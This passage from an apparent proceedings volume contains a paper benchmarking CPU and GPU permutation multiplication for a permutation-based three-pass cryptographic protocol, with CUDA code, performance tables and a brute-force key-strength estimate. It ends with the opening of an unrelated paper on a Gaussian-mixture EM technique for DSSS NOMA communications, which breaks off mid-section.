The three-pass cryptographic protocol based on permutations [8] uses several operations on permutations. The protocol can be accelerated using SIMD instructions [9]. One of the most used operations on permutations in the protocol is permutation multiplication. This operation is used to calculate the values of Y_1 to Y_4 and the keys σ_A and σ_B, and to determine the message π. Here, we assume that Alice wants to transfer a message to Bob using the three-pass cryptographic protocol [8]. In this case, Alice and Bob form the permutation α and calculate its decomposition into a product of disjoint cycles. These values are publicly available. Next, Alice generates her secret key s, the key permutation σ_A, and its inverse σ_A^{-1}. Bob generates his secret key r, the key permutation σ_B, and its inverse σ_B^{-1}. Additionally, Bob generates the permutation χ_B. These data are kept private by Alice and Bob separately. Alice maps the message m into a permutation π. Next, she calculates Y_1 = σ_A · π and sends Y_1 to Bob. Bob receives Y_1, calculates Y_2 = σ_B · Y_1 · χ_B, and sends it back to Alice. In turn, Alice calculates π^{-1} and the value of Y_3 = σ_A^{-1} · Y_2 · π^{-1} and sends Y_3 back to Bob. At last, Bob calculates the value of Y_4 = σ_B^{-1} · Y_3 and converts it to a product of disjoint cycles. The initial permutation π can be found by calculating a group of multiplications Y_1 · π^{-1}, where π is an assumed permutation formed depending on the disjoint cycles of Y_4. After that, the initial message m can be restored. In total, about half of the operations on permutations performed in the protocol are multiplication operations, so accelerating permutation multiplication should give the greatest effect. In this study, we evaluate the performance increase using modern GPUs.

The product of permutations A and B of length M is a permutation C = A · B, where C[i] = A[B[i]], and A[i], B[i], C[i] are the elements of the permutations at position i, i ∈ [0; M − 1]. So, permutation multiplication is a transformation of one value in memory into another value in memory. This operation is fast and independent (each element of the permutation product can be calculated independently of the other elements), so it is ideal to run in parallel. Nvidia GPUs have thousands of CUDA cores (compared to modern CPUs, which have tens of cores) with fast memory access, as described before, that can perform this operation extremely fast.
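To make the element-wise definition concrete, below is a minimal CUDA C++ sketch of this operation. It is an illustration only: the kernel name, variable names, and launch configuration are our own assumptions, not the implementation used in the experiments.

```cuda
#include <cstdio>
#include <cuda_runtime.h>

// Each thread computes one element of the product C = A * B, i.e. C[i] = A[B[i]].
__global__ void permutationMultiply(const int *A, const int *B, int *C, int M) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < M) {
        C[i] = A[B[i]];
    }
}

int main() {
    const int M = 32768;                  // permutation length used in the experiments
    const size_t bytes = M * sizeof(int);
    int *hA = new int[M], *hB = new int[M], *hC = new int[M];
    for (int i = 0; i < M; ++i) {         // sample permutations: identity and a cyclic shift
        hA[i] = i;
        hB[i] = (i + 1) % M;
    }

    int *dA, *dB, *dC;
    cudaMalloc(&dA, bytes); cudaMalloc(&dB, bytes); cudaMalloc(&dC, bytes);
    cudaMemcpy(dA, hA, bytes, cudaMemcpyHostToDevice);  // host -> device transfers
    cudaMemcpy(dB, hB, bytes, cudaMemcpyHostToDevice);

    const int threads = 256;
    const int blocks = (M + threads - 1) / threads;
    permutationMultiply<<<blocks, threads>>>(dA, dB, dC, M);

    cudaMemcpy(hC, dC, bytes, cudaMemcpyDeviceToHost);  // device -> host transfer
    std::printf("C[0] = %d\n", hC[0]);                  // expected: hA[hB[0]] = 1

    cudaFree(dA); cudaFree(dB); cudaFree(dC);
    delete[] hA; delete[] hB; delete[] hC;
    return 0;
}
```

Note that the kernel body is a single dependent memory load and store per element; as discussed below, the host-device transfers around the launch dominate the running time for a single multiplication.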
3 Experiments

CUDA comes with a software development kit that allows programmers to use the C++ programming language to develop their applications. We create an algorithm that multiplies two permutations using different hardware: the CPU (without SIMD instructions) and the GPU (using CUDA). We compare the performance of the CPU and GPU via Google Benchmark [23]; a minimal sketch of such a measurement is given below. The length of the permutations is fixed and set to 32,768 items. The test results are shown in Table 1.
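The study does not publish its benchmark source, so the following is only a plausible sketch of the CPU baseline measured with Google Benchmark; the function name and input setup are our own assumptions.

```cpp
#include <benchmark/benchmark.h>
#include <numeric>
#include <vector>

// CPU baseline: sequential permutation multiplication C[i] = A[B[i]]
// for permutations of length 32,768, timed by Google Benchmark.
static void BM_PermutationMultiplyCPU(benchmark::State& state) {
    const int M = 32768;
    std::vector<int> A(M), B(M), C(M);
    std::iota(A.begin(), A.end(), 0);   // identity permutations as sample inputs
    std::iota(B.begin(), B.end(), 0);
    for (auto _ : state) {
        for (int i = 0; i < M; ++i) {
            C[i] = A[B[i]];
        }
        benchmark::DoNotOptimize(C.data());  // keep the loop from being optimized away
    }
}
BENCHMARK(BM_PermutationMultiplyCPU);
BENCHMARK_MAIN();
```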
Table 1. Comparing the performance of one multiplication of two permutations

Hardware             | Multiplications per second
CPU (Ryzen 5 3600)   | 12,466
GPU (GTX 1070)       | 3,174
GPU (GTX 1650 GDDR6) | 2,756
Table 1 shows that the performance of permutation multiplication using the GPU is much lower than when the CPU is used. It seems that it should be the opposite, because the GPU should deliver much more performance than the CPU in such tasks. This result is explained by the GPU architecture. The GPU is a discrete hardware platform with its own computational units and memory. The GPU (device) is connected to the CPU (host) by a data bus. The data received from the user and computed on the CPU and its memory (the GPU cannot be used for general input-output operations, so we cannot use the GPU without the CPU) must be moved to the GPU (placed into its memory), processed, and transferred back to the CPU's memory. Transferring all the data to and from the GPU takes most of the time, even though the direct multiplication of permutations takes little time to complete (as with the multiplication of two permutations in this experiment).

To prove that, we use a profiling tool from Nvidia called nvprof, which can show the time spent in different phases of the calculations. We use the previously created algorithm to perform the experiment. The nvprof utility shows that about 55% of the time is spent copying the data from host memory to GPU memory, about 30% of the time is spent retrieving results from GPU memory to host memory, and only about 15% of the time is spent actually performing the multiplication of permutations.

Next, we perform an experimental study of the performance of multiplication of a large number of permutations. A preset number of permutations is generated in host memory and loaded into the GPU's memory at once. Then, multiple multiplications of permutations are performed. Note that all permutations and multiplication results are stored in GPU memory during the multiplication process. After the multiplication procedure, all the results are moved back to host memory, where they can be further processed. A sketch of this batched scheme is given below. For the experiment, we use an Nvidia GTX 1070 GPU, which uses the Pascal architecture and has 1,920 CUDA cores with 8 GB of GDDR5 memory. The results are shown in Table 2. We use the term “operation” to denote the multiplication of a group of permutations. For example, multiplying 100 permutations at once is an operation. An equivalent number of single permutation multiplications can be calculated by multiplying the number of permutation multiplications in an operation by the number of operations per second performed.
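A minimal sketch of how such a batched experiment can be organized is shown below. The contiguous batch layout and all names are our own illustrative assumptions; the essential point is that the host-device transfers happen once per batch rather than once per multiplication.

```cuda
#include <cuda_runtime.h>

// Batched multiplication: N permutation pairs of length M are stored
// contiguously (pair p occupies elements [p*M, (p+1)*M)). All inputs are
// copied to the device in one transfer, every element of every product is
// computed by its own thread, and all results come back in one transfer.
__global__ void batchPermutationMultiply(const int *A, const int *B, int *C,
                                         int M, int N) {
    long long idx = (long long)blockIdx.x * blockDim.x + threadIdx.x;
    if (idx < (long long)M * N) {
        long long p = idx / M;   // index of the permutation pair
        int i = (int)(idx % M);  // position inside the permutation
        C[p * M + i] = A[p * M + B[p * M + i]];
    }
}

void multiplyBatch(const int *hA, const int *hB, int *hC, int M, int N) {
    size_t bytes = (size_t)M * N * sizeof(int);
    int *dA, *dB, *dC;
    cudaMalloc(&dA, bytes); cudaMalloc(&dB, bytes); cudaMalloc(&dC, bytes);
    cudaMemcpy(dA, hA, bytes, cudaMemcpyHostToDevice);  // one bulk upload
    cudaMemcpy(dB, hB, bytes, cudaMemcpyHostToDevice);
    const int threads = 256;
    long long total = (long long)M * N;
    int blocks = (int)((total + threads - 1) / threads);
    batchPermutationMultiply<<<blocks, threads>>>(dA, dB, dC, M, N);
    cudaMemcpy(hC, dC, bytes, cudaMemcpyDeviceToHost);  // one bulk download
    cudaFree(dA); cudaFree(dB); cudaFree(dC);
}
```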
4 Results

The provided experiments show that the GPU performance depends on the number of permutation multiplications made at once. The results in Table 2 show that the multiplication of a set of permutations is much faster when the number of permutations is increased.

Table 2. The performance of multiple multiplications of permutations

Number of multiplications in operation | Operations per second | Equivalent number of single multiplications per second
1     | 3,174 | 3,174
2     | 3,174 | 6,348
5     | 2,987 | 14,935
10    | 2,869 | 28,690
20    | 2,354 | 47,080
50    | 1,706 | 85,300
100   | 1,220 | 122,000
200   | 746   | 149,200
500   | 346   | 173,000
1,000 | 188   | 188,000
2,000 | 93    | 186,000
3,000 | 62    | 186,000
GPU performance exceeds CPU performance starting from 5 permutations at a time. As shown in the literature [9], it is possible to increase the CPU's permutation multiplication performance by a factor of about 2.5 using SIMD instructions. Even in this case, using a GPU is much more effective for such operations.

A large number of permutation multiplications performed at once on a GPU can be used in tasks such as brute-force attacks. A cryptanalyst needs to load the operands (permutation pairs to be multiplied) into the GPU's memory, perform multiple multiplications in parallel, and retrieve all the results to check whether the protocol key has been found. Another scenario that benefits from this speed-up is a server in a data center that serves many clients using the cryptographic protocol. Tasks from different clients can be grouped and sent to the GPU to perform multiplications. In that case, all transfers between memories and all permutation multiplications are made at once, which gives the maximum performance.

According to [8], the secret keys s and r have the form of a vector s = (s_1, s_2, ..., s_n(α)), where 0 ≤ s_i ≤ l(α_i) − 1 and l(α_i) is the order of the cycle α_i in the decomposition of α into a product of disjoint cycles, α = ∏_{i=1}^{n(α)} α_i. The values of s and r are used to generate the key permutations σ_A = ∏_{i=1}^{n(α)} α_i^{s_i} and σ_B = ∏_{i=1}^{n(α)} α_i^{r_i}. Thus, if the cryptanalyst wants to perform a brute-force attack and find a key permutation, he must go through all the possible values of s_i and calculate the value of σ for each vector (s_1, s_2, ..., s_n(α)); the number of possible vectors is equal to ∏_{i=1}^{n(α)} l(α_i).

Here, we calculate the equivalent key permutation length for the key lengths of modern ciphers, which are 128, 192, or 256 bits. To perform a brute-force attack, the cryptanalyst must iterate over all possible keys, the number of which is equal to 2^k, where k is the key length. Now, we compare the number of possible key values to find the equivalent structure of α with the minimum possible permutation length. Here, we assume that l(α_i) = l(α_j) for all i, j. Then, the number of possible values of the key σ is equal to l(α)^n(α). The length of the key σ that is equivalent to the key length of modern ciphers must satisfy the inequality l(α)^n(α) ≥ 2^k. In other words, we need to find n(α) = ⌈log_{l(α)} 2^k⌉ for each key length k ∈ {128, 192, 256}. The results are shown in Table 3.

Table 3. Equivalent α structures for different key lengths

α cycle | 2^128: α cycle | 2^128: α permutation | 2^192: α cycle | 2^192: α permutation | 2^256: α cycle | 2^256: α permutation
length  | number         | length               | number         | length               | number         | length
3       | 81             | 243                  | 122            | 366                  | 162            | 486
4       | 64             | 256                  | 96             | 384                  | 128            | 512
5       | 56             | 280                  | 83             | 415                  | 111            | 555
6       | 50             | 300                  | 75             | 450                  | 100            | 600
7       | 46             | 322                  | 69             | 483                  | 92             | 644
8       | 43             | 344                  | 64             | 512                  | 86             | 688
9       | 41             | 369                  | 61             | 549                  | 81             | 729
10      | 39             | 390                  | 58             | 580                  | 78             | 780
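As a cross-check of Table 3, the short C++ snippet below recomputes n(α) = ⌈k / log2 l(α)⌉ (the smallest n(α) with l(α)^n(α) ≥ 2^k) and the equivalent permutation length l(α) · n(α). It is our own verification sketch, not code from the study; its output reproduces all the rows of the table.

```cpp
#include <cmath>
#include <cstdio>

// Cross-check of Table 3: for a key length of k bits and cycle length l,
// the smallest number of cycles n satisfying l^n >= 2^k is
// n = ceil(k / log2(l)), and the equivalent permutation length is l * n.
int main() {
    const int keyLengths[] = {128, 192, 256};
    for (int l = 3; l <= 10; ++l) {
        for (int k : keyLengths) {
            int n = (int)std::ceil((double)k / std::log2((double)l));
            std::printf("k = %d, l(alpha) = %d: n(alpha) = %d, length = %d\n",
                        k, l, n, l * n);
        }
    }
    return 0;
}
```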
The minimum suitable α length is 243 elements for key length k = 128, 366 elements for key length k = 192, and 486 elements for key length k = 256 (when l(α_i) = 3). Let l(α_i) = 3 and n(α) = 81. To perform a brute-force attack, the cryptanalyst must create 3^81 vectors s. A minimum of 81 permutation multiplications must be made to calculate the value of σ_A from each vector s. Therefore, the number of permutation multiplications needed to find the key permutation σ_A is equal to 81 · 3^81. According to the performance results from Table 2, it will take up to 81 · 3^81 / 188,000 ≈ 1.91 · 10^35 seconds for the cryptanalyst to find the key σ_A (using a GTX 1070 GPU), which is a significant value.

The results of the experiments show that the performance of permutation multiplication using the GPU begins to exceed the performance of a similar operation on the CPU starting with 5 parallel multiplications, reaching a value of about 14,900 multiplications per second. Maximum performance is achieved at 1,000 parallel multiplications (about 188,000 multiplications per second). The performance increases until a balance between copying to/from GPU memory and the multiplication operation is reached. A brute-force attack on the keys will take an enormous time if the transformation parameters of the three-pass cryptographic protocol based on permutations are chosen properly.
5 Discussion

According to Table 1, there is no increase in performance when using the GPU over the CPU for individual multiplications of permutations, which can be explained by the GPU architecture. The performance gain is achieved when multiple multiplications of permutations are made at once, as shown in Table 2. Table 3 shows the corresponding values of the α length, which allows making the assumption (relying on the calculated time expectations) that it is extremely difficult to find the key permutation for the three-pass cryptographic protocol based on permutations using specialized hardware when the length of α is more than 243 elements. The proposed approach can also be used in other areas related to factorial coding, such as [24–27].

Note that a cryptanalyst can use a more powerful GPU to perform an attack. The performance of permutation multiplications can be further increased by using modern GPUs, such as the Nvidia RTX series, which has up to 10,752 CUDA cores and even faster GDDR6X memory with higher bandwidth. Moreover, several GPUs can be used in parallel to execute permutation multiplications. Such an approach can increase overall performance by an order of magnitude, but still, the time needed to brute-force the keys is substantial.

Another way to further increase the performance of the three-pass cryptographic protocol based on permutations is to use a field-programmable gate array (FPGA). FPGAs allow the creation of various hardware blocks that perform computation-intensive tasks and can help to implement the cryptographic protocol completely in hardware. Different approaches to implementing cryptoprotocols using FPGAs are shown in the literature [28–32].
6 Conclusions

The results of the study show that using a GPU instead of a CPU to multiply only several permutations in parallel is not effective. At the same time, the use of a GPU can significantly speed up the multiplication of a large number of permutation pairs, achieving for 1,000 parallel multiplications a 15-fold increase in performance relative to CPU multiplication. Thus, the use of the CUDA platform makes it possible to more accurately assess the strength of the three-pass cryptographic protocol based on permutations against a brute-force attack and to set the appropriate transformation parameters. The minimum appropriate α length is 243 elements with a cycle structure equal to 3 × 81 for k = 128, 366 elements with a cycle structure equal to 3 × 122 for k = 192, and 486 elements with a cycle structure equal to 3 × 162 for k = 256.

Acknowledgements. This research was funded by the Ministry of Education and Science of Ukraine under grant 0120U102607.
References
1. Bassham, L.E., et al.: A statistical test suite for random and pseudorandom number generators for cryptographic applications. National Institute of Standards and Technology, Gaithersburg, MD, NIST SP 800-22r1a (2010). https://doi.org/10.6028/NIST.SP.800-22r1a
2. The Marsaglia Random Number CDROM Including the Diehard Battery of Tests. http://stat.fsu.edu/pub/diehard/
3. Faure, E., Myronets, I., Lavdanskyi, A.: Autocorrelation criterion for quality assessment of random number sequences. CEUR Workshop Proc. 2608, 675–689 (2020). https://doi.org/10.32782/cmis/2608-52
4. Faure, E.V., Shcherba, A.I., Rudnytskyi, V.M.: The method and criterion for quality assessment of random number sequences. Cybern. Syst. Anal. 52(2), 277–284 (2016). https://doi.org/10.1007/s10559-016-9824-3
5. L'Ecuyer, P., Simard, R.: TestU01: a C library for empirical testing of random number generators. ACM Trans. Math. Softw. (TOMS) 33(4), 22 (2007)
6. Yang, X.-W., Zhan, X.-Q., Kang, H.-J., Luo, Y.: Fast software implementation of serial test and approximate entropy test of binary sequence. Secur. Commun. Netw. 2021 (2021). https://doi.org/10.1155/2021/1375954
7. Luengo, E.A., Villalba, L.J.G.: Recommendations on statistical randomness test batteries for cryptographic purposes. ACM Comput. Surv. 54(4) (2021). https://doi.org/10.1145/3447773
8. Shcherba, A., Faure, E., Lavdanska, O.: Three-pass cryptographic protocol based on permutations. In: 2020 IEEE 2nd International Conference on Advanced Trends in Information Theory (ATIT), pp. 281–284 (2020). https://doi.org/10.1109/ATIT50783.2020.9349343
9. Lavdanskyi, A.O., Faure, E.V., Shcherba, V.O.: Increasing the speed of the permutations multiplication operation due to use of SIMD instructions. Visnyk Cherkaskogo derzhavnogo tehnologichnogo universitetu 3, 36–43 (2021). https://doi.org/10.24025/2306-4412.3.2021.245347
10. Lopresti, M., Piccoli, F., Reyes, N.: GPU permutation index: good trade-off between efficiency and results quality. In: Pesado, P., Gil, G. (eds.) CACIC 2021. CCIS, vol. 1584, pp. 183–200. Springer, Cham (2022). https://doi.org/10.1007/978-3-031-05903-2_13
11. Pessoa, T.C., Gmys, J., Melab, N., de Carvalho Junior, F.H., Tuyttens, D.: A GPU-based backtracking algorithm for permutation combinatorial problems. In: Carretero, J., Garcia-Blas, J., Ko, R.K.L., Mueller, P., Nakano, K. (eds.) ICA3PP 2016. LNCS, vol. 10048, pp. 310–324. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-49583-5_24
12. Gmys, J.: Optimal solving of permutation-based optimization problems on heterogeneous CPU/GPU clusters. In: Proceedings - 2018 International Conference on High Performance Computing and Simulation (HPCS), pp. 799–801 (2018). https://doi.org/10.1109/HPCS.2018.00129
13. Kruliš, M., Osipyan, H., Marchand-Maillet, S.: Employing GPU architectures for permutation-based indexing. Multimed. Tools Appl. 76(9), 11859–11887 (2016). https://doi.org/10.1007/s11042-016-3677-7
14. Hayakawa, H., Ishida, N., Murao, H.: GPU-acceleration of optimal permutation-puzzle solving. In: ACM International Conference Proceeding Series, vol. 10, pp. 61–69 (2015). https://doi.org/10.1145/2790282.2790289
15. Harju, A., Siro, T., Canova, F.F., Hakala, S., Rantalaiho, T.: Computational physics on graphics processing units. In: Manninen, P., Öster, P. (eds.) PARA 2012. LNCS, vol. 7782, pp. 3–26. Springer, Heidelberg (2013). https://doi.org/10.1007/978-3-642-36803-5_1
16. Lupescu, G., Gheorghe, L., Tapus, N.: Commodity hardware performance in AES processing. In: Proceedings - IEEE 13th International Symposium on Parallel and Distributed Computing (ISPDC), pp. 82–86 (2014). https://doi.org/10.1109/ISPDC.2014.14
17. Du, P., Weber, R., Luszczek, P., Tomov, S., Peterson, G., Dongarra, J.: From CUDA to OpenCL: towards a performance-portable solution for multi-platform GPU programming. Parallel Comput. 38(8), 391–407 (2012). https://doi.org/10.1016/j.parco.2011.10.002
18. CUDA GPUs | NVIDIA Developer. https://developer.nvidia.com/cuda-gpus
19. NVIDIA Ampere GA102 GPU Architecture. https://images.nvidia.com/aem-dam/en-zz/Solutions/geforce/ampere/pdf/NVIDIA-ampere-GA102-GPU-Architecture-Whitepaper-V1.pdf
20. Manavski, S.A.: CUDA compatible GPU as an efficient hardware accelerator for AES cryptography. In: 2007 IEEE International Conference on Signal Processing and Communications, pp. 65–68 (2007). https://doi.org/10.1109/ICSPC.2007.4728256
21. Pan, W., Zheng, F., Zhao, Y., Zhu, W.-T., Jing, J.: An efficient elliptic curve cryptography signature server with GPU acceleration. IEEE Trans. Inf. Forensics Secur. 12(1), 111–122 (2017). https://doi.org/10.1109/TIFS.2016.2603974
22. Gilger, J., Barnickel, J., Meyer, U.: GPU-acceleration of block ciphers in the OpenSSL cryptographic library. In: Gollmann, D., Freiling, F.C. (eds.) ISC 2012. LNCS, vol. 7483, pp. 338–353. Springer, Heidelberg (2012). https://doi.org/10.1007/978-3-642-33383-5_21
23. Google/Benchmark: A microbenchmark support library. https://github.com/google/benchmark
24. Faure, E., Shcherba, A., Vasiliu, Y., Fesenko, A.: Cryptographic key exchange method for data factorial coding, vol. 2654, p. 643 (2020)
25. Al-Azzeh, J.S., Ayyoub, B., Faure, E., Shvydkyi, V., Kharin, O., Lavdanskyi, A.: Telecommunication systems with multiple access based on data factorial coding. Int. J. Commun. Antenna Propag. (IRECAP) 10(2), 102 (2020). https://doi.org/10.15866/irecap.v10i2.17216
26. Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronisation method for short packet communication systems. In: 2021 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), pp. 1073–1077. Cracow, Poland (2021). https://doi.org/10.1109/IDAACS53288.2021.9660996
27. Al-Azzeh, J., Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronization method for data transmission systems with short packets. Egypt. Inform. J. (2022). https://doi.org/10.1016/j.eij.2022.05.005
28. Umer, U., Rashid, M., Alharbi, A.R., Alhomoud, A., Kumar, H., Jafri, A.R.: An efficient crypto processor architecture for side-channel resistant binary huff curves on FPGA. Electronics (Switzerland) 11(7) (2022). https://doi.org/10.3390/electronics11071131
29. Leelavathi, G., Shaila, K., Venugopal, K.R.: Implementation of public key crypto processor with probabilistic encryption on FPGA for nodes in wireless sensor networks. In: 2018 9th International Conference on Computing, Communication and Networking Technologies (ICCCNT) (2018). https://doi.org/10.1109/ICCCNT.2018.8493894
30. Kashif, M., Çiçek, İ.: Field-programmable gate array (FPGA) hardware design and implementation of a new area efficient elliptic curve crypto-processor. Turk. J. Electr. Eng. Comput. Sci. 29(4), 2127 (2021). https://doi.org/10.3906/ELK-2008-8
31. Gnanasekaran, L., Eddin, A.S., El Naga, H., El-Hadedy, M.: Efficient RSA crypto processor using Montgomery multiplier in FPGA. In: Arai, K., Bhatia, R., Kapoor, S. (eds.) FTC 2019. AISC, vol. 1070, pp. 379–389. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-32523-7_26
32. Doan, T.P., Ganesan, S.: CAN crypto FPGA chip to secure data transmitted through CAN FD bus using AES-128 and SHA-1 algorithms with a symmetric key. SAE Technical Paper 2017-01-1612 (2017). https://doi.org/10.4271/2017-01-1612
Machine Learning Technique Based on Gaussian Mixture Model for Environment Friendly Communications Oleksii Holubnychyi(B) , Yevhen Gabrousenko, Anatolii Taranenko, Olexandr Slobodian, and Olena Zharova National Aviation University, Kyiv, Ukraine [email protected]
Abstract. The paper proposes a machine learning technique that is based on the Gaussian mixture model and uses a developed parametric and criteria features based modification of the expectation-maximization (EM) algorithm with removing components of the Gaussian mixture model for a deep statistical analysis of cross-correlations between code structures in low power environment friendly direct sequence spread spectrum (DSSS) non-orthogonal multiple access (NOMA) communications. The features of the EM-algorithm for this purpose are described and analyzed. The proposed modification of the EM-algorithm contains the justification of the initial number of components of a mixture and of the initial model parameters, as well as three additional clustering criteria for adjusting the procedures of the EM-algorithm under conditions of mathematical singularities in the log-likelihood function. An example of the operation of the proposed technique for DSSS NOMA communications is presented and analyzed.
Keywords: Low power communications · DSSS · NOMA · machine learning · Gaussian mixture model · EM-algorithm · sustainable development
1 Introduction
Machine learning techniques, methods, and algorithms for data and signal processing are able to provide an opportunity to classify data and signal structures (e.g., cluster analysis [1, 2]), to predict processes (e.g., regression models [3–5]), to analyze structures and interlinkages between their parts and processes (e.g., hidden Markov models [6–8]), and to solve other problems in different areas, including applied mathematics and engineering, for example, the design of mobile underwater acoustic sensor networks [2], traffic prediction for a real wireless network [3], roadside estimation of a vehicle's center of gravity height [4], rain attenuation prediction for terrestrial links [5], subsurface flow path modeling from inertial measurement unit sensor data [7], and land cover classification using multitemporal satellite images [8]. An important feature of the above-mentioned machine learning techniques and approaches is partial or complete automation, which boils down to the unsupervised character of a robust data or signal processing that uses only the input data or signals to be analyzed.
The features of machine learning techniques and approaches also make them promising for achieving the Sustainable Development Goals (SDGs), also known as the Global Goals, which were adopted by the United Nations in 2015 as a universal call to action to end poverty, protect the planet, and ensure that by 2030 all people enjoy peace and prosperity [9]. Among the 17 SDGs, environment friendly communications, in particular safe and effective microwave radio links, mobile communications, and wireless cellular networks, are directly related both to goal 9, "Industry, innovation and infrastructure" (with respect to the new information and communication technologies), and to goal 11, "Sustainable cities and communities" (with respect to safe housing under the rapid growth of cities) [9]. Solutions to various problems related to these goals with respect to the new information and communication technologies can be found, in particular, in the fields of low power communications, such as low-power wide-area networks (LPWAN) and the LoRa (Long Range) protocol [10], cognitive radio and modern intelligent radio concepts [11], and spread spectrum communications, especially direct sequence spread spectrum (DSSS) technology combined with PSK modulation [12], which are often interrelated within one radio system, e.g., in some modern IoT radio links [13]. The paper is directly focused on the part of information and communication technologies that deals with machine learning based signal processing techniques for the physical layer of low power DSSS communications, which can also be combined with non-orthogonal signal and code structures, e.g., in reconfigurable intelligent surface (RIS)-assisted multi-user non-orthogonal multiple access (NOMA) communications [14]. For this kind of communications the problem, in particular, boils down to a deep analysis of the non-orthogonal structures (e.g., based on some kinds of complementary sequences [15–17]) during code or waveform generation and further data or signal processing, in order to improve the efficiency of data transfer and processing. In this regard, taking into account the machine learning approach, the aim of the paper is to propose a modification (parametric and criteria features) of the expectation-maximization (EM) algorithm with removing components of the Gaussian mixture model and additional clustering criteria for a deep statistical analysis of cross-correlations between code structures in low power environment friendly DSSS NOMA communications. The rest of the paper is organized as follows: Sect. 2 presents materials and methods, including a deep statistical analysis of cross-correlations between code structures based on the Gaussian mixture model for environment friendly DSSS NOMA communications using the proposed parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model; Sect. 3 contains experiments, which boil down to an example of the use of the proposed technique; simulation results are presented in Sect. 4; Sect. 5 presents a discussion, including the practical significance of the results; and, finally, Sect. 6 describes conclusions.
2 Materials and Methods
Let us describe the proposed deep statistical analysis of cross-correlations between code structures based on the Gaussian mixture model for environment friendly DSSS NOMA communications.
For a mixture of estimated unique and informative cross-correlations (i.e., above or below the main diagonal of the correlation matrix for code structures) $\tilde{r} = \{\tilde{r}_j\}$, $j = \overline{1, D}$, where $D = Q(Q-1)/2$ is the number of elements above or below the main diagonal of the correlation matrix and $Q$ is the number of code structures in a DSSS NOMA communication system, the Gaussian mixture model [18, 19] can be expressed as

$$p(\tilde{r}) = \sum_{k=1}^{K} \theta_k N\big(\tilde{r}; \mu_k, \sigma_k^2\big) = \sum_{k=1}^{K} \frac{\theta_k}{\sigma_k \sqrt{2\pi}} \exp\left(-\frac{(\tilde{r} - \mu_k)^2}{2\sigma_k^2}\right), \qquad (1)$$

where $p(\tilde{r})$ is the probability density function of $\tilde{r}$; $K$ is the number of components of a mixture, which is presented by the Gaussian mixture model; $N(\tilde{r}; \mu_k, \sigma_k^2)$ is the $k$-th Gaussian component (distribution) with the mean $\mu_k$ and the variance $\sigma_k^2$, which is part of the mixture $p(\tilde{r})$; $\theta_k$ is the weighting factor of the $k$-th Gaussian component in the mixture $p(\tilde{r})$, which may be taken as the probability that the random value $\tilde{r}$ belongs to the $k$-th Gaussian component $N(\tilde{r}; \mu_k, \sigma_k^2)$. The values of the weighting factors $\theta_k$, $k = \overline{1, K}$, in (1) are normalized in such a way that

$$\sum_{k=1}^{K} \theta_k = 1. \qquad (2)$$
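As a minimal numerical illustration of (1)–(2), the mixture density can be evaluated directly; the sketch below is a plain NumPy restatement of the formula, and the parameter values used in the example are arbitrary placeholders:

import numpy as np

def gmm_pdf(r, theta, mu, sigma):
    """Evaluate the Gaussian mixture density (1) at points r.

    theta, mu, sigma are length-K arrays; theta must sum to 1 as in (2).
    """
    r = np.asarray(r)[..., None]   # broadcast over the K components
    comp = (np.exp(-(r - mu) ** 2 / (2 * sigma ** 2))
            / (sigma * np.sqrt(2 * np.pi)))
    return (theta * comp).sum(axis=-1)

# Example with arbitrary placeholder parameters (K = 2):
theta = np.array([0.4, 0.6])
mu = np.array([-0.25, 0.25])
sigma = np.array([0.1, 0.1])
print(gmm_pdf([0.0, 0.25], theta, mu, sigma))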
During a statistical analysis of $\tilde{r}$ using the Gaussian mixture model, the vector of parameters (3) of the model (1) is subject to evaluation, taking (2) into account:

$$\omega = \{\theta, \mu, \sigma\} = \{\theta_1, \ldots, \theta_K, \mu_1, \ldots, \mu_K, \sigma_1, \ldots, \sigma_K\}. \qquad (3)$$
It should, however, be noted that the vector $\omega$ is a non-core result of the analysis in the proposed machine learning technique. The main product of the analysis is the set of values of the hidden variables of the Gaussian mixture model $\gamma = \{\gamma_{j,k}\}$, $j = \overline{1, D}$, $k = \overline{1, K}$, which are the posterior probabilities that $\tilde{r}_j$ belongs to the $k$-th Gaussian component of a mixture (cluster); $\gamma$ is defined using $\omega$. Let us propose a parametric and criteria features based modification of the EM-algorithm with removing components of the Gaussian mixture model for the estimation of $\omega$ and $\gamma$ during the deep statistical analysis of cross-correlations between code structures in DSSS NOMA communications. The development of the modification is also needed to take into account the features and restrictions of a standard realization of the EM-algorithm [20–22], which implements a maximum likelihood estimation method that maximizes the log-likelihood function $L(\omega|\tilde{r})$ for the hypothesis about parameters $\omega$ with observed data $\tilde{r}$ containing $D$ elements (cross-correlations between codes):

$$L(\omega|\tilde{r}) = \sum_{j=1}^{D} \ln p(\tilde{r}_j|\omega) = \sum_{j=1}^{D} \ln \sum_{k=1}^{K} \frac{\theta_k}{\sigma_k \sqrt{2\pi}} \exp\left(-\frac{(\tilde{r}_j - \mu_k)^2}{2\sigma_k^2}\right). \qquad (4)$$

The parameter estimates of components of the Gaussian mixture model, which can be obtained using (4), are $\hat{\omega} = \operatorname{argmax}_{\omega} L(\omega|\tilde{r})$. The EM-algorithm at its core consists of iterative procedures up to the convergence of the log-likelihood function $L(\omega|\tilde{r})$ to its maximum value, and contains two steps at each iteration [20, 21]:
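For completeness, (4) can be computed in a numerically robust way; the sketch below uses the standard log-sum-exp trick via scipy.special.logsumexp, which is an implementation choice rather than part of the authors' method:

import numpy as np
from scipy.special import logsumexp

def log_likelihood(r, theta, mu, sigma):
    """Log-likelihood (4) of the data r under the mixture parameters omega."""
    r = np.asarray(r)[:, None]                 # shape (D, 1), broadcast over K
    log_comp = (np.log(theta)
                - np.log(sigma) - 0.5 * np.log(2 * np.pi)
                - (r - mu) ** 2 / (2 * sigma ** 2))
    return logsumexp(log_comp, axis=1).sum()   # sum over j of ln sum over k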
Expectation step (E-step), at which the values of the hidden variables of the Gaussian mixture model $\gamma^{s-1} = \{\gamma_{j,k}^{s-1}\}$, $j = \overline{1, D}$, $k = \overline{1, K}$, are estimated using (5) at the $s$-th iteration (starting with $s = 1$) through a current approximation of the model parameters $\omega^{s-1} = \{\theta^{s-1}, \mu^{s-1}, \sigma^{s-1}\} = \{\theta_1^{s-1}, \ldots, \theta_K^{s-1}, \mu_1^{s-1}, \ldots, \mu_K^{s-1}, \sigma_1^{s-1}, \ldots, \sigma_K^{s-1}\}$:

